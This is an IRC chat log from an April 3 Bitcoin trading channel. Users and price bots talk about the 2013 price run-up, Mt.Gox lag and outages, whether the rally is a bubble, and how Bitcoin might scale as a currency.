13:45:58 mjr_ I still don't like how I can't use v0.3 or something. and not be able to get on the bitcoin network Apr 03 13:45:59 ;;bc,24hprc Apr 03 13:46:03 TradeFortress: bitcoincharts are down so bots can't quote Apr 03 13:46:09 Error: Failed to retrieve data. Try again later. Apr 03 13:46:15 Oh joy. Apr 03 13:46:17 :( Apr 03 13:46:49 TradeFortress: you can create your own version that gives you what you like about v3 and make it compatible...this is my point, software is not a right Apr 03 13:47:21 mjr_ backward compatibity should be a right IMO Apr 03 13:47:37 I can send emails fine using ancient software. Apr 03 13:50:17 ;;calc 0.00068373*150 Apr 03 13:50:17 0.1025595 Apr 03 13:50:50 s.mpoe at $0.01 already Apr 03 13:51:51 er.. $0.1 Apr 03 13:52:04 what about bet when it reaches dollar parity? lol Apr 03 13:52:41 TradeFortress: i agree...but in a capitalistic sense, you can choose what people offer or make your own, i think for long term adoption backward compatiblity is of course necessary Apr 03 13:53:01 [HAVELOCK] [SDICE] 1 @ 0.35499999 BTC [+] Apr 03 13:53:20 but this cuts to the core of my point, everyone relies on software developers, unfortunately the software doesn't spring fully formed from the sea foam Apr 03 13:54:55 mjr_, unless, rpc standard Apr 03 13:55:00 who cares what software you use Apr 03 13:55:10 TradeFortress: true, and i think that should be where it goes Apr 03 13:55:42 but even so, someone releases their version and it works until it doesn't...issues arise and people vote with their feet and dollars Apr 03 13:55:58 its survival of the fittest, but that doesn't always mean pure ideas, that can mean influence Apr 03 13:56:12 hmm at least SMTP has rfcs, suppose we are rehashing what was said after the fork. Apr 03 13:56:15 VHS was more fit than BetaMax, even though it was worse as a technology Apr 03 13:56:53 from my perspective, what survives is what should have survived, a little tautological i know, but that is how the world works Apr 03 13:57:07 the victors write the history books Apr 03 13:59:03 heh Apr 03 13:59:17 I thought it got crazy before I went to bed Apr 03 13:59:17 lol Bugpowder: you set them at 119 or 117? Apr 03 13:59:38 I sold some at 121 and 123 Apr 03 13:59:40 oope Apr 03 13:59:47 nice Apr 03 13:59:52 mpoebot is down? Apr 03 13:59:55 yes Apr 03 14:00:01 cuz bitcoincharts is down Apr 03 14:00:20 it'd be nice to have some kind of backup Apr 03 14:00:29 well Apr 03 14:00:33 you can almost ddos mpex just by ddos'ing bitcoincharts Apr 03 14:00:46 its probablybetter for mircea_popescu's wallet if it is down :-P Apr 03 14:01:10 pizzaman1337 only the options :p Apr 03 14:01:32 options get the most volume, don't they? Apr 03 14:01:50 not really. Apr 03 14:01:59 depends. last month i think they did yea Apr 03 14:02:04 this is rediccccc Apr 03 14:02:13 who is buying all these coins, yeesh Apr 03 14:02:36 thats whats weird Apr 03 14:02:41 ;;bc,stats Apr 03 14:02:43 Current Blocks: 229470 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 353 blocks | Next Difficulty In About: 1 day, 22 hours, 48 minutes, and 23 seconds | Next Difficulty Estimate: 7770171.80365 | Estimated Percent Change: 16.045 Apr 03 14:02:43 running up again eh ? silly peoples. Apr 03 14:02:52 there is another goxlag that we don't measure quite as well Apr 03 14:02:58 ThickAsThieves: http://www.reddit.com/r/Bitcoin/comments/1bkhj5/it_cant_be_daytraded/ Apr 03 14:03:13 it's probably fake but prolly not Apr 03 14:03:13 http://bitcoinity.org/markets Apr 03 14:03:16 people who saw cnbc yesterday or the day before...they can't even get into gox for like 10 days maybe Apr 03 14:03:18 the bid/ask volumes tho... lol Apr 03 14:05:08 european exchanges could accept western union from the US ... hell, even cash in mail would be faster Apr 03 14:06:11 jurov americans are insane about their little country. Apr 03 14:06:25 would rather eat paper there than get out. Apr 03 14:06:28 we all knew bitcoin could hit meteoric rises Apr 03 14:06:36 its scary Apr 03 14:06:50 http://www.businessinsider.com/why-bitcoin-is-like-no-other-bubble-weve-seen-before-2013-4 Apr 03 14:06:51 meteors fall, not rise, I guess? Apr 03 14:07:05 lol that is a great point jurov Apr 03 14:07:14 oh geez Apr 03 14:07:19 i'll have to be more careful Apr 03 14:07:24 haha what a turn lol Apr 03 14:07:46 ;;ticker Apr 03 14:07:47 BTCUSD ticker | Best bid: 139.78888, Best ask: 140.00000, Bid-ask spread: 0.21112, Last trade: 140.00000, 24 hour volume: 122604.42532157, 24 hour low: 104.97500, 24 hour high: 147.00000, 24 hour vwap: 122.42927 Apr 03 14:07:51 meteors do both, meteorites fall from an earth perspective. Apr 03 14:08:46 whats the mtgox queue like now ? >9k ? Apr 03 14:09:09 so when do the real holders start to cash out Apr 03 14:09:11 what happens if prices shoots to 200, and it just holds Apr 03 14:09:17 is this impossible? Apr 03 14:09:29 too many people with 100k of coins Apr 03 14:09:33 lol, there's a deposit queue on coinbr, too Apr 03 14:09:35 100k coins Apr 03 14:09:57 just waiting Apr 03 14:10:28 Bugpowder the problem is they kinda don't want to. Apr 03 14:10:56 this is a very dangerous non=participatory run-up by now Apr 03 14:11:05 I talked to someone that holds 100k last night Apr 03 14:11:11 in that a bunch of noobs / "daytraders" in their own mind are cycling the same btc among each other at the exchanges Apr 03 14:11:18 "You need to be a special kind of an idiot to implement system as slow and fucked up as mtgox's." -reddit Apr 03 14:11:19 getting tempted of shaving of a bit Apr 03 14:11:22 and when they finally panic they'll expect actual players to buy from them. Apr 03 14:11:25 it won't happen over 100. Apr 03 14:11:37 so basicvally... any dollar over 100 anyone pays on a btc is a dollar lost. Apr 03 14:12:06 argh Apr 03 14:12:10 I wish I was trusted Apr 03 14:12:14 depends on the assumption that it is sheeple day traders Apr 03 14:12:53 and it also depends on the demand dropping off way before the new adopters get in Apr 03 14:13:10 demand is fueled by price increase expectation. Apr 03 14:13:14 yes Apr 03 14:13:15 thus a classical bubble. Apr 03 14:13:19 yes Apr 03 14:13:28 well... it won't work. Apr 03 14:13:30 but there are emergent phenomena Apr 03 14:13:41 ;;market --sell 100000 Apr 03 14:13:43 A market order to sell 100000 bitcoins right now would net 7998039.7682 USD and would take the last price down to 36.0500 USD, resulting in an average price of 79.9804 USD/BTC. | Data vintage: 0.0044 seconds Apr 03 14:13:48 and in this case bitcoin is so small that the fuel supply is huge Apr 03 14:13:48 ^ Apr 03 14:13:50 shame there are no stats mtgox demographic Apr 03 14:14:06 mjr_ it's not really that huge. Apr 03 14:14:14 all it takes is telling the few dozen people with money to stfu already. Apr 03 14:14:18 the entire world economy? Apr 03 14:14:27 the reddit crowd of 50k people with 50 bux each is irrelevant. Apr 03 14:14:29 that is the fuel available Apr 03 14:14:34 notrly Apr 03 14:14:43 how? everyone with fiat could buy bitcoins Apr 03 14:14:50 if they chose to Apr 03 14:14:50 I wish I had confidence that gox wont explode with my money Apr 03 14:15:03 now, as they learn more and more Apr 03 14:15:07 mjr_ yeah. and every single guy could get a hot girl Apr 03 14:15:09 more may choose to Apr 03 14:15:09 if he chose to. Apr 03 14:15:13 except not how things work irl. Apr 03 14:15:17 not the same at all Apr 03 14:15:25 i have x amount of cash, i CAN buy a bitcoin Apr 03 14:15:29 no you can't. Apr 03 14:15:32 fast cash is out Apr 03 14:15:43 how can i not buy a bitcoin? i guaranttee i can buy one right now Apr 03 14:15:53 on what, coinbase ? :D Apr 03 14:16:02 no probably bitfloor or bitinstant Apr 03 14:16:16 within the hour...usually Apr 03 14:16:20 you know what i mean. Apr 03 14:16:44 point being, the number of possible adopters is orders of magnitudes higher than current adopters Apr 03 14:16:53 sure. Apr 03 14:17:00 so the possible new speculators is huge Apr 03 14:17:01 but they don't have to all do it right nao Apr 03 14:17:03 nor should they. Apr 03 14:17:09 speculators are not adopters. Apr 03 14:17:10 and as it looks like a "sure thing" that number will increase Apr 03 14:17:16 and retarded trend followers are NOT speculators. Apr 03 14:17:25 IMO whoever buys one has "adopted" it Apr 03 14:17:33 that's too loose for this convo i think Apr 03 14:17:38 perhaps true Apr 03 14:17:48 but the point is this...critical mass Apr 03 14:17:49 by that logic every time i pay a waitress i'm getting married Apr 03 14:17:59 huh? that doesn't follow Apr 03 14:18:12 money changing hands does not necessarily reflect any sort of adoption Apr 03 14:18:28 i now own a bitcoin...i am a part of the bitcoin economy Apr 03 14:18:38 arguably. Apr 03 14:18:38 i can sell immediately Apr 03 14:18:44 i may not be a long term believer Apr 03 14:18:54 so then what have you adopted ? Apr 03 14:18:56 mtgox ? Apr 03 14:18:57 its like ants and brains Apr 03 14:19:04 from this low level base speculation Apr 03 14:19:12 ecnomies of scale form and emerge Apr 03 14:19:24 economies of scale are a property of production Apr 03 14:19:26 phenomena where things that weren't possible become possible Apr 03 14:19:30 that has nothing to do with financial speculation. Apr 03 14:19:50 for exapmle, i'm western union...i can't move any signifigant amount of money over btc network Apr 03 14:19:58 oh wait, now i can...adopt Apr 03 14:20:07 furthering the rise Apr 03 14:20:22 and creating a platform for the next person to see that it now makes sense for them Apr 03 14:20:23 the market cap hasn't been the limiting factor since mid feb. Apr 03 14:20:38 well...we have seen bitpay process 5 million dollars in one month Apr 03 14:20:39 i understand what you're saying but i think you're focusing on relatively small signals Apr 03 14:20:54 whereas there's much larger ones painting a diff picture. Apr 03 14:21:00 and i agree...i'm just saying that this is the network effect in action Apr 03 14:21:23 not really. Apr 03 14:21:28 every person buying one bitcoin not only gets one bitcoin they also create a positive externality Apr 03 14:21:38 this is just a bunch of poor and desperate people who are unemployed and stuck with their computer in a barely furnished apartment Apr 03 14:21:44 hoping they've finally found the way out of the hole. Apr 03 14:21:46 it is not that. Apr 03 14:21:49 irrelevant Apr 03 14:22:12 like saying every person who works a minimum wage job is not part of US economy Apr 03 14:22:27 not really. Apr 03 14:22:29 they are not a large part, but as a group they make up a large portion Apr 03 14:22:58 that's not the point tho. the point is that people are buyingsomething they can't afford and haven't researched on the unfounded hope that it will "go up more". Apr 03 14:23:03 this will fuck them over. Apr 03 14:23:06 ;;bids 0 Apr 03 14:23:08 There are currently 41174385 bitcoins demanded at or over 0.0 USD, worth 10050755.7489 USD in total. | Data vintage: 0.0106 seconds Apr 03 14:23:15 there is no point discussing events and externalities and whatever else. fuck them over, it will. Apr 03 14:23:28 i agree Apr 03 14:23:40 now that aside, higher mkt cap is great, sure. Apr 03 14:23:54 but this is what i was saying...if everyone tomorrow says "i heard of this thing called bitcoin, i will get 1 bitcoin" and there are a million of them Apr 03 14:24:04 people with a clue priced out of the market by the lemming mania isn't quite as great, Apr 03 14:24:05 that is a hundred million dollars more in the bitcoin economy Apr 03 14:24:06 but they'll live. Apr 03 14:24:12 signifigant, though each person did something minor Apr 03 14:24:21 it's not 1mn worth of bitcoin economy. Apr 03 14:24:28 it's 1mn worth of bitcoin fiat value. Apr 03 14:24:36 fair distinction Apr 03 14:24:45 and this is why the entire adoption thing is so important. Apr 03 14:24:51 i totally agree Apr 03 14:24:52 if all they do with their bitcoin is try and resell it ... Apr 03 14:24:56 it could have been a fucking vase. Apr 03 14:24:56 but this is bootstrapping 101 Apr 03 14:25:00 it doesn't need to be bitcoin for that purpose Apr 03 14:25:03 I tend to agree, that there is a share of people out there buying this shit with money they can't afford to lose. Including So EU folks. However, I do wonder if "real money" will at some point also chose to dip their toes in the water? Apr 03 14:25:04 they could go resel tulips Apr 03 14:25:20 yes...but tulips didn't actually exist Apr 03 14:25:24 heh apt analogy Apr 03 14:25:24 bgupta you think it hasn't so far ? Apr 03 14:25:38 they were trading tulip futures and options on tulips that had never been created and never would Apr 03 14:25:42 right. Apr 03 14:25:48 these bitcoins exist Apr 03 14:25:52 so why bother with bitcouin, if you wanna pyramid go trade moonrocks. Apr 03 14:25:55 so i don't think that is an apt analogy Apr 03 14:25:58 with a 1.3 billion marketcap? Apr 03 14:25:58 actually, go trade ltc. Apr 03 14:26:00 you could do that Apr 03 14:26:06 ok maybe their little toes Apr 03 14:26:10 my point is this, it is too early and most are too stupid to understand Apr 03 14:26:15 so buy one Apr 03 14:26:16 bgupta fucking fate of doom, trying to protect bitcoin from attacks. Apr 03 14:26:19 and hold it Apr 03 14:26:26 and see what happens with some skin in the game Apr 03 14:26:39 most people would say sure why not Apr 03 14:26:51 and as far as this distinction between fiat and bitcoin Apr 03 14:27:03 what difference does it make if i hold 4 5's or one twenty Apr 03 14:27:08 fiat is making change Apr 03 14:27:35 that is why the ATM is so important Apr 03 14:27:42 500 - Internal server error - Bitcoin Charts Apr 03 14:27:45 hold money in bitcoin, transfer money with bitcoin, withdraw in local currency Apr 03 14:27:53 that thinfg is becoming a study in creative ways to fail Apr 03 14:28:18 not sure about their implementation, but the idea is sound...same as trading "demand deposits" for cash Apr 03 14:28:22 [MPEX] [O.USD.C101T] 5 @ 0.27296125 = 1.3648 BTC [+] Apr 03 14:28:41 Italian police have seized a record (EURO)1.3 billion ($1.7 billion) in cash and property from a single person, a Sicilian alternative energy entrepreneur alleged to have close ties to the Mafia. Apr 03 14:28:46 heh Apr 03 14:28:48 bitcoin is layer 2, maybe 3 in a financial OSI model Apr 03 14:29:04 we need layer 7 to emerge Apr 03 14:29:49 lol mjr Apr 03 14:29:53 seems italy is balancing its budget roman empire style. Apr 03 14:30:30 how can the network keep up with transactions? transactional data from visa alone is mind boggling. Apr 03 14:30:46 i never understood how ppl can call it a currency, maybe theres something im not understanding. Apr 03 14:30:59 currency is the medium of exchange Apr 03 14:31:07 like..it takes a while sometimes to transfer btc just from one point to another Apr 03 14:31:19 less time than mailing an envelope of cash Apr 03 14:31:22 right but how can the network keep up Apr 03 14:31:27 this is the point Apr 03 14:31:28 what about buying gas Apr 03 14:31:29 KRS1337: even medium businesses can easily keep up with blockchain growing 1TB/month Apr 03 14:31:34 do people use fedwire for everytransaction? Apr 03 14:31:40 am i supposed to wait there while the gas station receives my btc? Apr 03 14:31:43 no Apr 03 14:31:46 eventually Apr 03 14:31:55 i dun see it.. Apr 03 14:32:00 but easy turnkey solution needs to be engineered Apr 03 14:32:01 you will have services that will have enough trust or deposit to be able to do 0 conf Apr 03 14:32:18 for example, i have done business with you every day Apr 03 14:32:22 i don't need to wait Apr 03 14:32:28 lol yeaaah Apr 03 14:32:30 its not even that i trust you as a person Apr 03 14:32:32 tourism? Apr 03 14:32:34 idk Apr 03 14:32:43 i just trust that you don't have the ability to double spend (not trivial) Apr 03 14:32:43 dont see it Apr 03 14:32:56 trust...heh Apr 03 14:33:20 just like i was trusting my friend about mining til i realized he was trolling me to buy my gpu's Apr 03 14:33:31 friend of 25 yrs Apr 03 14:33:34 as in, pulling off a successful double spend in real life after a face to face transaction is probably very difficult, AND not worht it Apr 03 14:33:36 let's get back to what the blaze does well, cause btc not rly : http://www.theblaze.com/stories/2013/04/03/man-who-gave-birth-to-three-babies-unsuccessfully-begs-for-a-divorce-in-this-odd-legal-conundrum/ Apr 03 14:34:16 i dont see the network at this point to keep up with transactional data sufficient for btc to be a currency..doubt it will evar be there =( Apr 03 14:35:02 KRS1337 that is the point...the network doesn't have to Apr 03 14:35:34 banks use fedwire to move around the DELTA from their days transactions, they aggregate and net the transactions first Apr 03 14:35:43 and most businesses will have to do that too Apr 03 14:36:04 i dont see btc getting from me to you with that model. Apr 03 14:36:05 the same way that mt gox does not publish to the block chain for EVERY trade Apr 03 14:36:13 and yet it does, right now Apr 03 14:36:15 every day Apr 03 14:36:20 u are talking about having an account with every merchant Apr 03 14:36:24 no Apr 03 14:36:29 mjr_ amuysingly, people are still proposibng that bitcoin financials be handled by "colored coins:" Apr 03 14:36:32 i'm talking about you having one account Apr 03 14:36:32 oh see then theres stuff im not understanding Apr 03 14:37:03 for example, if i have a gox account, and everyone trusts gox, they can take my transaction without even hitting the blockchain Apr 03 14:37:11 first its the "colored" coins then its..."whites" only accepted here ma'am Apr 03 14:37:25 this is what i was saying about "bitcoin is layer 1 or 2 maybe 3 of the financial OSI model" Apr 03 14:37:35 gox would be like a layer 4 Apr 03 14:37:36 mjr_ and I strongly think it'll happen Apr 03 14:37:36 ohhhhhhhhhhhhh i see Apr 03 14:37:45 I gottcha =D Apr 03 14:37:48 and eventually we will see layers 5-7 Apr 03 14:37:58 yep Apr 03 14:38:25 anyway, i have to do some work, but i like the anarchy of a free market, whatever happens is supposed to happen, how well you do depends on your skill and risk profile Apr 03 14:38:44 financial darwinism Apr 03 14:38:52 have a good one =D Apr 03 14:43:58 [MPEX] [O.USD.C047T] 4 @ 0.75 = 3 BTC Apr 03 14:45:45 deposits flushed. Apr 03 14:47:41 litecoin at .043 Apr 03 14:47:45 stop the madness Apr 03 14:48:09 huh Apr 03 14:48:14 litecoin at 5.48 Apr 03 14:48:37 does btc drive ltc or something or is this spec Apr 03 14:48:43 https://bitcointalk.org/index.php?topic=2151.msg28228#msg28228 this made me think of jurov. Apr 03 14:55:08 [BTCTC] [B.YABMC] 1 @ 0.01002 BTC [-] Apr 03 14:56:10 [BTCTC] [ASICMINER-PT] 1 @ 0.788 BTC [+] Apr 03 14:56:17 [BTCTC] [ASICMINER-PT] 1 @ 0.7888 BTC [+] Apr 03 14:56:24 [BTCTC] [ASICMINER-PT] 1 @ 0.7889 BTC [+] Apr 03 14:56:42 !last h vtx Apr 03 14:56:43 Last trade for VTX on HAVELOCK was at 0.479955 BTC [+] Apr 03 14:56:51 !last m s.dice Apr 03 14:56:52 Last trade for S.DICE on MPEX was at 0.00310001 BTC [-] Apr 03 14:57:06 !ticker m s.dice Apr 03 14:57:07 [MPEX:S.DICE] 1D: 0.00310001 / 0.00367057 / 0.00400173 (23221 shares, 85.23 BTC), 7D: 0.0031 / 0.00331136 / 0.00448 (714710 shares, 2,366.66 BTC), 30D: 0.00300001 / 0.004241 / 0.006225 (1567539 shares, 6,647.93 BTC) Apr 03 15:00:28 ;;bc,24hprc Apr 03 15:00:38 Error: Failed to retrieve data. Try again later. Apr 03 15:00:43 ;;goxlag Apr 03 15:00:45 MtGox lag is 8.573174 seconds. During this time, light travels 0.017180544706 AU. You could have sent a bitcoin one full loop along the orbit of the Moon around Earth (0.016 AU). Apr 03 15:04:45 [BTCTC] [S.DICE-PT] 20 @ 0.00479 = 0.0958 BTC [+] Apr 03 15:07:43 [BTCTC] [S.DICE-PT] 21 @ 0.0048 = 0.1008 BTC [+] Apr 03 15:17:05 so where is this guy, shortinb BTC @ 34$ ?? Apr 03 15:17:25 shorting* Apr 03 15:17:53 he's gone Apr 03 15:18:02 [HAVELOCK] [SDICE] 1 @ 0.355 BTC [+] Apr 03 15:18:02 Edmonton Apr 03 15:18:14 off in the tar sands Apr 03 15:18:15 [BTCTC] [GSDPT] 100 @ 0.00362 = 0.362 BTC [-] Apr 03 15:18:18 driving a new truck Apr 03 15:19:13 and watch behind him every 5 min. Apr 03 15:19:21 watching* Apr 03 15:19:44 cmon gox Apr 03 15:19:48 clear mah shit Apr 03 15:19:51 [BTCTC] [BITVPS] 1 @ 0.00301 BTC [-] Apr 03 15:20:30 [BTCTC] [BITVPS] 1 @ 0.00301 BTC [-] Apr 03 15:20:57 [BTCTC] [BITVPS] 98 @ 0.003 = 0.294 BTC [-] Apr 03 15:21:22 did we just freaking stabilize at 140 Apr 03 15:21:57 $avg Apr 03 15:22:07 ;;bids 0 Apr 03 15:22:09 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 03 15:22:09 There are currently 41100820 bitcoins demanded at or over 0.0 USD, worth 10190648.8699 USD in total. | Data vintage: 0.0108 seconds Apr 03 15:23:44 North America is arriving at its desk. Apr 03 15:24:08 ltc ftw? Apr 03 15:24:57 shorting at 34 :( poor guy Apr 03 15:25:06 Bugpowder yea Apr 03 15:25:18 one does not simply naked short bitcoin Apr 03 15:26:39 $avg Apr 03 15:26:50 thestringpuller: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 03 15:27:00 ????? Apr 03 15:27:12 ;;avgprc Apr 03 15:27:13 (avgprc ) -- Returns volume-weighted average price data from MtGox. is a three-letter currency code, is the time window for the average, and can be '24h', '7d', or '30d'. Apr 03 15:27:18 ;;avgprc usd 24h Apr 03 15:27:28 Error: Failed to retrieve data. Try again later. Apr 03 15:27:35 srsly? Apr 03 15:27:38 dafuck Apr 03 15:27:42 ;;ticker Apr 03 15:27:42 BTCUSD ticker | Best bid: 140.10000, Best ask: 140.59898, Bid-ask spread: 0.49898, Last trade: 140.10000, 24 hour volume: 124750.35588336, 24 hour low: 106.50004, 24 hour high: 147.00000, 24 hour vwap: 123.35842 Apr 03 15:29:31 could they make the bots sound like the unsullied in game of thrones? Apr 03 15:29:56 (more accurately in the series a song of ice and fire) Apr 03 15:39:05 "The Obama administration is engaged in a broad push to make more home loans available to people with weaker credit" Apr 03 15:39:07 totally. Apr 03 15:39:22 Also Teslas. Apr 03 15:39:23 http://www.teslamotors.com/true-cost-of-ownership Apr 03 15:40:25 Why do I get the feeling that the reason the gox price is over 140 is because THEY AREN'T CLEARING BTC DEPOSITS. Apr 03 15:40:44 dont worry they are clearing wires as well Apr 03 15:40:47 arent Apr 03 15:41:10 they are probably making me thousands of dollars right now Apr 03 15:41:17 by this delay Apr 03 15:41:50 http://bitcoinity.org/markets Apr 03 15:41:52 you gonna dump? Apr 03 15:41:55 have you looked at the ask side ? Apr 03 15:43:01 [HAVELOCK] [SDICE] 4 @ 0.355 = 1.42 BTC [+] Apr 03 15:43:10 "Luke Jr. was not only evasive in the thread linked, but he also went out of his way to deceive. He also deserves a scammer tag IMO, but I guess that's a seperate matter." Apr 03 15:43:22 hey, people are starting to notice luke isn't really trustworthy at all ?! Apr 03 15:43:24 im amazed. Apr 03 15:43:44 +1 Apr 03 15:43:53 well its church going people, what can you expect Apr 03 15:44:41 ;;ticker Apr 03 15:44:42 BTCUSD ticker | Best bid: 141.08001, Best ask: 141.08999, Bid-ask spread: 0.00998, Last trade: 141.09000, 24 hour volume: 124551.53625655, 24 hour low: 106.95100, 24 hour high: 147.00000, 24 hour vwap: 123.48914 Apr 03 15:46:46 kakobrekla that's not even it. they have a little scam entreprise going, giga propping bfl, bfl giving money to luke, iot's an entire nest of fuckwittery. Apr 03 15:47:05 but they're getting squeezed and yes i see sentences in their future. Apr 03 15:47:47 i would guess after their unmitigated failure of epic proportions trying to attack sdice they should sorta get exactly how deep in the shit they be. Apr 03 15:58:21 ;;nethash Apr 03 15:58:22 62896.7954203 Apr 03 16:06:33 vires in numeris :) Apr 03 16:07:45 [MPEX] [O.USD.C164T] 1 @ 0.12092692 BTC Apr 03 16:08:21 ;;ticker Apr 03 16:08:22 BTCUSD ticker | Best bid: 141.10430, Best ask: 141.60000, Bid-ask spread: 0.49570, Last trade: 141.60000, 24 hour volume: 125115.26791435, 24 hour low: 106.95100, 24 hour high: 147.00000, 24 hour vwap: 123.71988 Apr 03 16:08:32 Doesn|t Apr 03 16:09:16 Doesn't look like it's correcting today Apr 03 16:09:37 ITS CORRECTING TO ITS TRUE VALUE $100000 Apr 03 16:10:12 Might be painful if the bubble is fueled by the stream of just verified mtgox users Apr 03 16:11:17 should be interesting Apr 03 16:11:26 i don't think most of the money showed up to the party yet Apr 03 16:13:19 april 5th for the coinlabs it seems Apr 03 16:13:48 based on what/ Apr 03 16:14:01 I signed up in the first hour Apr 03 16:14:06 [BTCTC] [PAJKA.BOND] 5 @ 0.105 = 0.525 BTC [+] Apr 03 16:14:09 heard nothing so far Apr 03 16:14:59 bot is back Apr 03 16:18:57 DO U THINK THIS BUBBLE IS DUE TO THE FB TIPPING APP? Apr 03 16:19:59 2001-09-12 02:55:42 Arch [1612111] D ALPHA monitor@ccbill.c|report2.ccbill.com: Load high|Load averages high on report2.ccbill.com: 42.54 14.58 24.08 Tue Sep 11 23:56:01 MST 2001 Apr 03 16:20:07 on their page I think, that buys were delayed until funds cleared on the 5th Apr 03 16:20:13 lmao on sept 11 ccbill (pron processor) was having load issues Apr 03 16:21:27 2001-09-12 02:56:00 Arch [1425048] C ALPHA 300~MPfetchData:openConnectionToManager:ERROR CONNECTING:192.168.35.97 : www36 connectToServerPort:socket/socket timed out at /home/crdtdrv/creditderivatives/script/MPfetchData.pl line 342, chunk 192972. Apr 03 16:21:30 that also sounds happy. Apr 03 16:21:35 anyway. the new wikileaks is fun. Apr 03 16:22:08 new? Apr 03 16:22:19 huh, have they really not released anything this year yet? Apr 03 16:22:27 ;;goxlag --au Apr 03 16:22:27 (goxlag [--raw]) -- Retrieve mtgox order processing lag. If --raw option is specified only output the raw number of seconds. Otherwise, dress it up. Apr 03 16:22:41 ;;goxlag Apr 03 16:22:51 Error: Problem retrieving gox lag. Try again later. Apr 03 16:23:26 TomServo buncha crap imo Apr 03 16:25:15 [MPEX] [S.DICE] 300 @ 0.0035 = 1.05 BTC [+] Apr 03 16:27:24 [BTCTC] [ASICMINER-PT] 1 @ 0.7889 BTC [+] Apr 03 16:30:19 whups, mtgox 'bad gateway' Apr 03 16:31:12 aww Apr 03 16:32:01 [HAVELOCK] [VTX] 10 @ 0.4151 = 4.151 BTC [-] Apr 03 16:32:41 greed, for lack of a better word, is good... Apr 03 16:33:01 [HAVELOCK] [VTX] 9 @ 0.415 = 3.735 BTC [-] Apr 03 16:33:42 what's the word on this bitcoin-central stuff? I haven't been following. i guess finally people won't use rails. Apr 03 16:34:24 mircea_popescu: why is bot only quoting half the time? Apr 03 16:39:19 thestringpuller no ? Apr 03 16:39:33 pigeons they've not said. Apr 03 16:40:04 ;;ticker Apr 03 16:40:12 err... gox down? Apr 03 16:40:24 Error: Failure to retrieve ticker. Try again later. Apr 03 16:40:27 probably Apr 03 16:40:52 lol Apr 03 16:41:03 lag is one thing, but when was the last time that the website was down? Apr 03 16:41:34 [MPEX] [O.USD.P149T] 1000 @ 0.53221009 = 532.2101 BTC Apr 03 16:41:43 [MPEX] [O.USD.P146T] 1000 @ 0.50349593 = 503.4959 BTC Apr 03 16:41:46 mother of god Apr 03 16:41:58 [MPEX] [O.USD.P143T] 1000 @ 0.47535254 = 475.3525 BTC Apr 03 16:42:00 a few days ago Apr 03 16:42:06 are those sells? Apr 03 16:42:19 [MPEX] [O.USD.P140T] 718 @ 0.44780886 = 321.5268 BTC Apr 03 16:42:23 no, they are buys Apr 03 16:42:32 $vwap ^oix Apr 03 16:42:34 mircea_popescu: ^OIX 1 day: no data 7 day: average: 104.38442482 high: 139.37849244 low: 93.3570601 volume: 14875 btc: 6862.82806499 30 day: no data Apr 03 16:42:56 that's a lot of puts... Apr 03 16:43:07 if mtgox comes out with a hack... Apr 03 16:43:19 <[\\\]> mircea_popescu: I'll have properly called it. Apr 03 16:43:28 then it might just eb the trade of the century Apr 03 16:43:56 [\\\] sigh Apr 03 16:44:09 <[\\\]> you know its coming Apr 03 16:44:14 <[\\\]> they handle thousands of btc Apr 03 16:44:20 <[\\\]> and if they're all valued at $125 per Apr 03 16:44:21 you'd think that there would eb selling on the other exchanges... Apr 03 16:44:27 <[\\\]> thats a pretty juicy target Apr 03 16:44:51 <[\\\]> but for the record, mtgox.com loads for me Apr 03 16:45:01 [HAVELOCK] [VTX] 5 @ 0.4 = 2 BTC [-] Apr 03 16:45:03 <[\\\]> oh look, we're at $141 Apr 03 16:45:46 if mtgox goes hella down long term like tradehill price will plummet Apr 03 16:46:09 shhh Apr 03 16:46:46 <[\\\]> ;;rate thestringpuller -1 uses the word 'hella' Apr 03 16:46:46 Error: For identification purposes, you must be authenticated to use the rating system. Apr 03 16:47:04 ;;rate thestringpuller 1 hella cool Apr 03 16:47:04 Error: For identification purposes, you must be authenticated to use the rating system. Apr 03 16:47:04 the coinlab deal can't happen fast enough Apr 03 16:47:29 lol Apr 03 16:47:50 gox is up for me Apr 03 16:48:05 ;;ticker Apr 03 16:48:16 Error: Failure to retrieve ticker. Try again later. Apr 03 16:48:24 they cut off api, is bitcoinity.org up? Apr 03 16:48:53 the coinlab deal can't happen << yeah Apr 03 16:49:16 up, but no fresh data Apr 03 16:49:34 last trade 39 min ago... Apr 03 16:49:54 because making a trading engine that doesn't die with the slightest hint of traffic is ROCKET SURGERY Apr 03 16:50:10 [MPEX] [S.MPOE] 6200 @ 0.00068037 = 4.2183 BTC [-] Apr 03 16:50:12 [MPEX] [S.MPOE] 8450 @ 0.00069259 = 5.8524 BTC [+] Apr 03 16:53:24 Scrat you're just jealous because they're your competitor. Apr 03 16:54:29 it just sucks for the bitcoin community as a whole when this shit happens Apr 03 16:54:30 it's socket science actually Apr 03 16:54:39 word Apr 03 16:54:43 n mtgox-rt Apr 03 16:55:07 ;;calc 1777.64s / 60 Apr 03 16:55:07 Error: invalid syntax (, line 1) Apr 03 16:55:10 mircea_popescu: I fucking wish I could become a competitor. sadly the amount of red tape and paperwork to pull it off is otherwordly Apr 03 16:55:13 ;;calc 1777.64s/60 Apr 03 16:55:13 Error: invalid syntax (, line 1) Apr 03 16:55:15 ;;ticker Apr 03 16:55:19 ;;calc 1777.64/60 Apr 03 16:55:19 29.6273333333 Apr 03 16:55:23 <[\\\]> lol @ rocket surgery Apr 03 16:55:25 Error: Failure to retrieve ticker. Try again later. Apr 03 16:57:06 Scrat im just freely distributing that nonsense, i got a whole semi's worth Apr 03 17:03:23 ;;ticker Apr 03 17:03:24 Error: Failure to retrieve ticker. Try again later. Apr 03 17:03:29 BTCUSD ticker | Best bid: 189.40000, Best ask: 189.89898, Bid-ask spread: 0.49898, Last trade: 189.40000, 24 hour volume: 124750.35588336, 24 hour low: 106.50004, 24 hour high: 147.00000, 24 hour vwap: 123.35842 Apr 03 17:03:41 wat Apr 03 17:03:53 :trollface: Apr 03 17:03:54 error4733: oh u Apr 03 17:04:04 well at least s.dice is up Apr 03 17:04:06 haha Apr 03 17:04:35 im like 189?! Apr 03 17:04:37 lol Apr 03 17:04:50 <--- chowned Apr 03 17:04:53 aptly named error Apr 03 17:04:57 haha Apr 03 17:04:57 ;;goxlag Apr 03 17:05:07 Error: Problem retrieving gox lag. Try again later. Apr 03 17:05:31 we're probably out to neptune by now. Apr 03 17:06:13 whoa Apr 03 17:06:14 ;;goxlag[goxlag] Apr 03 17:06:14 Error: Problem retrieving gox 